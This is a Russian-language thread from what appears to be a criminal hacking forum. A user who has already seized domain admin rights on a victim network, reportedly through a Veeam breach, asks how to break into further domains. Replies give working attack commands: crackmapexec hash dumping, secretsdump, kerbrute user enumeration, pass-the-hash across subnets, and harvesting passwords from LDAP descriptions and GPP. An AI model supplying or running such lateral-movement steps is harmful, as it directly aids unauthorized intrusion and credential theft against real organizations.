• XSS.stack #1 – первый литературный журнал от юзеров форума

Продвижение по другим доменам

MinerMario

RAID-массив
Пользователь
Регистрация
13.10.2023
Сообщения
80
Реакции
12
Гарант сделки
5
Всем доброго дня,столкнулся с такой проблемой - на сети имеются права доменного администратора,весь домен уже опползал,есть второй домен,были получены креды интерпрайз админа,однако он не может подключиться. Тему с дочерними доменами видел,но в данном случаем она мне не подошла. Какие есть варианты событий,кроме как искать учетки юзеров и чекать через event viewer пользователя,который конектиться с др домена?
 
Всем доброго дня,столкнулся с такой проблемой - на сети имеются права доменного администратора,весь домен уже опползал,есть второй домен,были получены креды интерпрайз админа,однако он не может подключиться. Тему с дочерними доменами видел,но в данном случаем она мне не подошла. Какие есть варианты событий,кроме как искать учетки юзеров и чекать через event viewer пользователя,который конектиться с др домена?
как вариант, можешь собрать хеши локальных админов с машин домена, куда имеется достут, и попробовать их на вход под локальным админом на машины, которые в других доменах или в воркгуппе.
 
как вариант, можешь собрать хеши локальных админов с машин домена, куда имеется достут, и попробовать их на вход под локальным админом на машины, которые в других доменах или в воркгуппе.
Я уже снял ntds и посмотрел всех админов,они вроде существуют в группе локакльных админов,но чет никуда не входят
 
Ntds.dit — это файл базы данных Active Directory, который хранит информацию о пользователях, группах, компьютерах и других объектах домена. Он является одним из ключевых компонентов операционной системы Windows Server и используется для аутентификации и авторизации пользователей, а также для управления ресурсами в пределах домена.
не доменных пользователей, локальных. сдампить их хеши можешь таким образом, например:
crackmapexec smb 192.168.1.5 -u Administrator -p P@ssw0rd --sam
или используй secretsdump.py но без -just-dc-ntlm
 
Я уже снял ntds и посмотрел всех админов,они вроде существуют в группе локакльных админов,но чет никуда не входят
Снял хэши дочернего домена? Не входят по RDP, SMB или что?
 
не доменных пользователей, локальных. сдампить их хеши можешь таким образом, например:
crackmapexec smb 192.168.1.5 -u Administrator -p P@ssw0rd --sam
или используй secretsdump.py но без -just-dc-ntlm
сдампить получилось,но расшифровать хэш не вышло,попробовал path-the-hesh и выдало ошибку(пользователь не найден). Пока плохо получается
 
Снял хэши дочернего домена? Не входят по RDP, SMB или что?
Нет,хеши основного,домена,там могут попастьтся пользователи,которые относяться к другому домену. Также я получил всех доменыых админов,просмотрел их принадлежность к группам и нашел парочку local membership:"Enterprise admins", "Administrators". Ну и они по логике могли подключаться и по rdp и по ssh и по smb
 
Нет,хеши основного,домена,там могут попастьтся пользователи,которые относяться к другому домену. Также я получил всех доменыых админов,просмотрел их принадлежность к группам и нашел парочку local membership:"Enterprise admins", "Administrators". Ну и они по логике могли подключаться и по rdp и по ssh и по smb
Собери всех пользователей домена основного, crackmapexec smb 192.168.1.5 -u admin -p 'pass' --users
Создай список с пользователями и через kerbrute перечисли их на дочернем домене, ./kerbrute_linux_amd64 userenum -d 'дочерний_домен' --dc 'ip_dc' 'писок_пользователей.txt' -o 'найденные_пользователи.txt'
Если есть все хэши с основного домена и будут найдены такие же пользователи в дочернем домене, то через pth перебери их, crackmapexec smb 192.168.1.5 -u найденный_пользователь -H ':хэш'

Я бы еще запросил описание юзеров на основном домене, там бывают пароли, crackmapexec ldap 192.168.1.5 -u admin -p 'pass' -M get-desc-users
Пароли бывают и в политиках GPP, crackmapexec smb 192.168.1.5 -u admin -p 'pass' -M gpp_autologin или crackmapexec smb 192.168.1.5 -u admin -p 'pass' -M gpp_password

А так все функции можешь посмотреть так - crackmapexec smb -L или crackmapexec ldap -L
Может что получится
 
сдампить получилось,но расшифровать хэш не вышло,попробовал path-the-hesh и выдало ошибку(пользователь не найден). Пока плохо получается


crackmapexec smb 192.168.1.5 -u Administrator -H af44082f7c7279578430f85a771730da --local-auth
--local-auth когда работаешь с локальными пользователями обязательно используй эту опцию, иначе крак будет автоматом подтягивать домен, в коором находится машина, а тебе нужно авторизоваться с хостнеймом.
 
Всем доброго дня,столкнулся с такой проблемой - на сети имеются права доменного администратора,весь домен уже опползал,есть второй домен,были получены креды интерпрайз админа,однако он не может подключиться. Тему с дочерними доменами видел,но в данном случаем она мне не подошла. Какие есть варианты событий,кроме как искать учетки юзеров и чекать через event viewer пользователя,который конектиться с др домена?
90% сеток в трастах есть одинаковые сервисные пользователи с одинкаовыми паролями, прогони всех пользователей с нтдс на другом домене, 90% получишь админа.
 
crackmapexec smb 192.168.1.5 -u Administrator -H af44082f7c7279578430f85a771730da --local-auth
--local-auth когда работаешь с локальными пользователями обязательно используй эту опцию, иначе крак будет автоматом подтягивать домен, в коором находится машина, а тебе нужно авторизоваться с хостнеймом.
с внешки другой домен не видино,так локально уже пробовал зайти
 
crackmapexec smb 192.168.1.5 -u Administrator -H af44082f7c7279578430f85a771730da --local-auth
--local-auth когда работаешь с локальными пользователями обязательно используй эту опцию, иначе крак будет автоматом подтягивать домен, в коором находится машина, а тебе нужно авторизоваться с хостнеймом.
снятый хеш локольного пользователя crackmapexec smb 192.168.1.5 -u Administrator -p P@ssw0rd --sam не подлкючается вообще ни в какую
 
снятый хеш локольного пользователя crackmapexec smb 192.168.1.5 -u Administrator -p P@ssw0rd --sam не подлкючается вообще ни в какую

давай по порядку, выполняешь команду и вывод сюда показывай (только аккуратно, паливо замазать или заменить не забудь)
1. crackmapexec smb 192.168.1.5 -u Administrator -p P@ssw0rd --sam
где -u Administrator -p P@ssw0rd креды доменного админа от домена1

2. crackmapexec smb 192.168.1.0/24 -u Administrator -H af44082f7c7279578430f85a771730da --local-auth
где -H af44082f7c7279578430f85a771730da хеш из дампа прошлой команды

>> с внешки другой домен не видино,так локально уже пробовал зайти
что ты имеешь ввиду? машины домена2, куда ты хочешь пробиться, ты не видишь из-под ВПН? они в другой подсети?
 
давай по порядку, выполняешь команду и вывод сюда показывай (только аккуратно, паливо замазать или заменить не забудь)
1. crackmapexec smb 192.168.1.5 -u Administrator -p P@ssw0rd --sam
где -u Administrator -p P@ssw0rd креды доменного админа от домена1

2. crackmapexec smb 192.168.1.0/24 -u Administrator -H af44082f7c7279578430f85a771730da --local-auth
где -H af44082f7c7279578430f85a771730da хеш из дампа прошлой команды

>> с внешки другой домен не видино,так локально уже пробовал зайти
что ты имеешь ввиду? машины домена2, куда ты хочешь пробиться, ты не видишь из-под ВПН? они в другой подсети?
Если по порадяку,то я исполнил 1ую команду и получил хэш локального пользователя,далее второй командой попытался с этим хэшом присоединиться ко второму домену,доступ у меня впн,однако второй домен у меня не сканиться с внешки,локально никак не показывается и компы не пингуются,диапазон у сети один. Пробовал перебор сети также с внешки,и он также ничего мне не дал
 
Но кстати,я этот метод попробовал еще на другой сети,где тоже у меня болячка с получением доступа во второй домен. Сеть видна вся,но при подключении, авторизация по полученному хэшу не проходит
 
Если по порадяку,то я исполнил 1ую команду и получил хэш локального пользователя,далее второй командой попытался с этим хэшом присоединиться ко второму домену,доступ у меня впн,однако второй домен у меня не сканиться с внешки,локально никак не показывается
Нихера не понял. Так креды локального пользака, ЛА или ДА? Как ты видишь второй домен и пытаешься приконнектится к нему, если он не сканится и не пингуется.. Компухтер второго домена, или дк второго домена. Куда ты коннектишся. Не пойму чёт
 
Но кстати,я этот метод попробовал еще на другой сети,где тоже у меня болячка с получением доступа во второй домен. Сеть видна вся,но при подключении, авторизация по полученному хэшу не проходит
Братан, на каждом домене креды у доменных админов могут быть разные. По хэшу авторизация не проходит, потому что креды не верные
 
Извиняюсь,что ввел в заблуждение,сейчас постараюсь объяснить
Так креды локального пользака, ЛА или ДА?
Получены хэш локального администратора,не расшифрован
Как ты видишь второй домен и пытаешься приконнектится к нему, если он не сканится и не пингуется..
Методы,которыми со мной поделились 3ToN и Ellnoir, были использованы на сети,у которой второй домен я вижу. Есть просто еще одна сеть,с такой же проблемой у меня и второй домен из локалки не показывается,увы
Куда ты коннектишся.
Приконектиться пытался по smb с хешом локального администратора к DC второго домена

Надеюсь смог разрулить эту путанницу
 
дай больше вводных данных
скан производится через через мячик на ip и порты (что из локалки,что внутри,скан один и тот же). В этом скане мне показываются 4и доменные группы. Доступ имею только в одну из них,получен был при пробитии veeam. Мне нужно попасть в 3и других домена. Снимал на сети bloodhound и не нашел упоминания о них,был лишь замечен еще один совершенно непонятный домен,который по сути мертв, проверил командой - nltest /trusted_domains /all_trusts . Ни один траст по ним не пингуется,и упоминания других доменом,которые мне нужны, также отсутствует. По smb,на авось, проверял кто из пользователей может заходить туда,но увы и ах,не помогло. Есть уже подозрения,что они никак не связаны и это просто отдельная доменная группа
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх